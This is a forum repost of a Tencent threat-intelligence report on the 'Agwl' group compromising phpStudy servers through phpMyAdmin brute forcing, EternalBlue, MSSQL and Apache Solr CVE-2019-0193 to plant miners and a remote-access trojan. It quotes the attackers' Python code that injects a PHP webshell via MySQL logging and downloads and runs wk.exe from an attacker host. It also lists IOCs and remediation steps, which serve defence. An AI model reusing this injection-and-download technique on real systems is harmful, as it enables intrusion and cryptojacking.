查看: 1133|回复: 0
收起左侧

[技术原创] Agwl团伙再攻Phpstudy,新增Apache Solr漏洞利用

[复制链接]
腾讯电脑管家
发表于 2019-9-24 16:28:02 | 显示全部楼层 |阅读模式
本帖最后由 腾讯电脑管家 于 2019-9-24 16:31 编辑

一、背景
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户。

2019年920日,在杭州西湖区公安分局网警大队通报的打击涉网违法犯罪暨“净网2019”专项行动战果中,公布了破获的一起在PhpStudy中植入后门的案例。通报内容指出,犯罪嫌疑人使用黑客手段非法侵入PhpStudy软件官网,篡改软件安装包内容并植入后门,并利用该手段共非法控制计算机67万余台,非法获取账号密码类、聊天数据类、设备码类等数据10万余组。最后,利用盗取的账号密码,入侵修改服务器数据实施诈骗,非法牟利共计600余万元。详细内容参考:https://mp.weixin.qq.com/s/s-5cVTxIJcDfdRjtnEnI0g

这是一起严重的供应链攻击事件,通过入侵开发组件供应网站并对公开下载的程序集成包进行污染,不法分子”悄无声息“地将后门植入到大量开发者的电脑中。

与供应链攻击事件的偶发性不同,PhpStudy弱口令爆破攻击事件则呈现持续高发态势。腾讯安全御见威胁情报中心2018年7月发现针对phpMyadmin后台管理登录页面爆破登录,植入远控和挖矿木马的事件。

20191月又发现“Agwl”团伙针对phpStudy网站服务器的批量入侵行动。

2019年8月腾讯安全御见威胁情报中心监测到“Agwl”团伙在最新的入侵行动将Linux系统纳入攻击范围。

近日,腾讯安全御见威胁情报中心检测到“Agwl”团伙针对phpStudy网站服务器再度发起攻击,此次攻击“升级”后,被入侵服务器会下载释放“永恒之蓝”漏洞攻击SQL爆破攻击、Apache Solr 8月公布的最新漏洞攻击模块,并使用这些攻击模块进一步扩散传播当前病毒的核心程序。

此次受“Agwl”团伙攻击影响超过一万台服务器,影响严重地区分别北京、广东和浙江。受害地区分布如下:
“Agwl”团伙攻击影响范围分布图

二、详细分析
开始攻击时,黑客首先针对web服务相关端口进行扫描,发现开放端口的IP后,利用路径特征探测目标IP是否采用phpMyAdmin系统,如果发现存在,则使用弱口令尝试进行爆破登录。

爆破攻击成功则通过cmd_shell下载植入木马http[:]//down.us-hack.ru/wk.exewk.exe会继续下载挖矿木马及远控木马,同时下SQL爆破、“永恒之蓝”漏洞利用、Apache Solr漏洞(CVE-2019-0193)利用三种攻击方式进一步扩散传播病毒。
“Agwl”针对PhpStudy攻击流程


2
.1前期准备
我们从服务器下载得到压缩包文件Python36.zip,解压释放得到phpstudy_python3.py。phpstudy_python3.py是一个Python脚本文件,作为探测攻击核心脚本,落地后在木马释放的Python程序环境下运行。

从脚本开头定义了变量 “C:\\AppServ\\MySQL\\”、“linuxphpstudy”等,为同时针对Windows系统Linux系统攻击作准备。

开始探测前,首先先通过扫描工具Masscan(文件名0893.exe)扫描80、81、82、888080、80818082端口,扫描范围为全网IP段(1.0.0.0~223.255.255.255),并将开放端口的IP保存至open.txt,随后执行bpsa.bat加载探测程序。

Bpsa.bat加载python探测脚本phpstudy_python3.py针对扫描到开放端口的IP进行探测,探测成功则执行shell,根据攻击过程中的计数参数,探测攻击9999次之后暂停。

2
.2探测入侵
开始探测phpstudy_python3.py开启多个工作线程。首先通过匹配路径url + "/phpmyadmin"来发现是否存在phpmyadmin。

发现phpmyadmin后,请求路径url+"/pmd"尝试获取登录页面,若成功获取到登录页面,则进入bppass()中进行弱口令爆破。

爆破使用的弱口令密码保存在password.txt文件中,打开该文件可以看到,目前用来爆破的弱口令高3000多个

爆破成功后,进入get_shell()中,将一段sql命令传给shell执行,SQL命令最终通过wget.exe下载木马wk.exe并启动。
path = path + "wk.php"
wget = '''http://down.us-hack.ru/wget.exe'''
xz = str(base64.b64encode(wget.encode('utf-8')),'utf-8')
wk = '''wget.exe http://down.us-hack.ru/wk.exe &wk.exe'''
xz1 = str(base64.b64encode(wk.encode('utf-8')),'utf-8')
xz2 = str(base64.b64encode(hm.encode('utf-8')),'utf-8')
wjm = '''"wget.exe", "w"'''
sql = ["set global general_log='on';","SET global general_log_file='"+path+"';","SELECT '<?php $wk = fopen("+wjm+");$sj =file_get_contents(base64_decode('"+xz+"')) ;fwrite($wk, $sj);fclose($wk);sleep(3);@system(base64_decode('"+xz1+"'));@system(base64_decode('"+xz2+"'));phpinfo();?>';"]

2
.3扩散传播


2.3.1 SQL弱口令爆破
在入侵成功后续阶段,通过SQL爆破程序CSQL.exe进行端口扫描爆破(1433/2433/3433),扫描范围为全网段IP。

爆破成功后通过xp_
cmdshell下载http[:]//down.us-hack.ru/wk.exe植入。

2
.3.2 “永恒之蓝”漏洞攻击
扫描全网段IP的445端口,针对开放端口的IP,利用NSA武器中的“永恒之蓝”、“双脉冲星”、“永恒浪漫”进行漏洞利用攻击。

漏洞攻击成功后执行x86/x64.dll下载下载http[:]//down.us-hack.ru/wk.exe植入。

2.3.3 Apache Solr
漏洞攻击
2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重。

漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。

攻击时先扫描端口(全网段IP),然后将开放Solr默认端口8983的IP保存,并利用得到的IP列表构造攻击时需要的URL:http://IP:8983保存至ips.txt。

扫描到开放8983端口IP地址后,利用CVE-2019-0193 (Python攻击代码打包ll.exe)对每个IP进行攻击。(漏洞攻击代码github:https://github.com/jas502n/CVE-2 ... er/CVE-2019-0193.py

攻击成功后植入http[:]//down.us-hack.ru/wk.exe

2
.4挖矿木马
入侵成功后下载挖矿木马母体hxxp://down.halloo.ru/udefrag.zip,解压后释放到C:\Windows\Fonts\debug\目录下。

Udefrag.exe是百度拼音的正常子程序,在运行时会自动加载同目录下的configure.dll(由木马替换而来)执行,病毒使用正规文件进行“白+黑”启动,试图绕过杀软检测。

configure.dll被加载执行后首先删除旧的挖矿文件C:\Windows\System\debug\svchost.exe
,然后下载挖矿文件压缩包xmr.zip并利用下载的解压程序unzip.exe进行解压释放C:\Windows\System\debug\目录。

最后启动挖矿进程,矿机程序采用开源挖矿程序XMRSTAK编译。矿池地址为:pool.us-hack.ru:3333,钱包地址:
A9RvGu2BG6S6NNo13YyU1TgcDFP7NXFUDZ84RGgE5N3X16WSD5S9ockNpfvnmLpjf326SReabxtwuAMSwgsQwwpLDCbqi1Zbase64解码后)


2
.5远控木马
在攻击最后阶段会下载http[:]//down.us-hack.ru/agwl.exe,agwl.exe下载大灰狼远控木马http[:]//dash.us-hack.ru/NetSyst96.dll加载到内存执行。

三、安全
建议
1、 服务器关闭不必要的高危端口,如139/445/1433等;

2、 加固服务器,修补服务器安全漏洞,及时修复永恒之蓝”系列漏洞;Apache Solr CVE-2019-0193漏洞修复建议将Apache Solr升级至8.2.0或之后的版本

3、 对于phpStudy一类的集成环境,在安装结束后应及时修改phpmyadmin 密码MySQL密码为高强度密码,避免被黑客探测入侵。

4、如有发现感染“Agwl”挖矿病毒,可按照以下方法手动清理:
删除目录
C:\Windows\Fonts\Python36\
删除文件
C:\Windows\Fonts\debug\Udefrag.exe
C:\Windows\Fonts\debug\Configure.dll
C:\Windows\System\debug\svchost.exe
C:\Windows\System32\wk.exe
C:\ProgramData\wk.exe
C:\xp.exe

5、网站管理员可使用腾讯云网站管家智能防护平台(网址:https://s.tencent.com/product/wzgj/index.html),该系统具备Web入侵防护,0Day漏洞补丁修复等多纬度防御策略,可全面保护网站系统安全。

6、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。

IOCs
IP
103.13.221.20
14.29.194.121

Domain
down.us-hack.ru
down2.us-hack.ru
down.halloo.ru
dash.us-hack.ru

URL
hxxp://down.halloo.ru/Alloy.zip
hxxp://down.halloo.ru/udefrag.zip
hxxp://down.halloo.ru/zx.exe
hxxp://down.halloo.ru/Python36.zip
hxxp://down.halloo.ru/authman.zip
hxxp://down.us-hack.ru/update.exe
hxxp://down.us-hack.ru/vc_redist.x64.exe
hxxp://down.us-hack.ru/wk.exe
hxxp://down.us-hack.ru/xmr.zip
hxxp://down.us-hack.ru/udefrag.zip
hxxp://down.us-hack.ru/agwl.exe
hxxp://down.us-hack.ru/authman.zip        
hxxp://down.us-hack.ru/Python36.zip
hxxp://down.us-hack.ru/unzip.exe
hxxp://dash.us-hack.ru/NetSyst96.dll
hxxp://14.29.194.121:22/angge.php

MD5
a11eb542f7afda5d8488efda4cdf28ee
89d422febf1eba1a7fe0fabb39544d69
2a516ca66cafd6e1e64ee4620503abaa
a74f591e5b09adaae4d37fae16e65405
9579ec1a5388ba40b585103ac065e04d
3418ebb7ea2e04484504d6cb34a2f51e
44d14a9a862278d416f27740b3488c26
ea22ed41cec42e73ad341b82959ff86c
047a53b43f10c50c651bdea7a3842150
3ccc45a219dfc96d0062a58eb29384b9

钱包地址:
A9RvGu2BG6S6NNo13YyU1TgcDFP7NXFUDZ84RGgE5N3X16WSD5S9ockNpfvnmLpjf326SReabxtwuAMSwgsQwwpLDCbqi1Z

参考
链接:




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 09:43 , Processed in 0.130981 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表